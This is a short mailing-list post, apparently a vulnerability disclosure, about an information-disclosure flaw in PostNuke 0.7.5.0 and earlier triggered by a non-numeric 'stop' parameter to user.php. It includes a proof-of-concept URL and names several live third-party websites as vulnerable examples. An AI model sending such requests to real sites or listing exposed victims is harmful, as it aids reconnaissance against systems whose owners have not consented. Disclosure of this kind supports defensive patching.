<<< Date Index >>>     <<< Thread Index >>>

Vulnerability in PostNuke



Error PostNuke in the variable stop which can be exploited by malicious people to disclose system information. Luckily the vulnerability affects to the 0.7.5.0 version and minors.

POC:
http://www.[web-with-PostNuke].com/user.php?stop=a (no numeric value)
Example:
http://www.dev-postnuke.com/user.php?stop=a
http://www.americavivetv.com/user.php?stop=a
http://www.ciberpsique.net/user.php?stop=a
http://www.bonsaiabm.com/user.php?stop=a http://www.elrincondejada.net/user.php?stop=a http://www.salsa.org.pl/user.php?stop=a http://www.choco.org/user.php?stop=a


by rMrGvG

http://SNI-LABS.com
since 1998

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.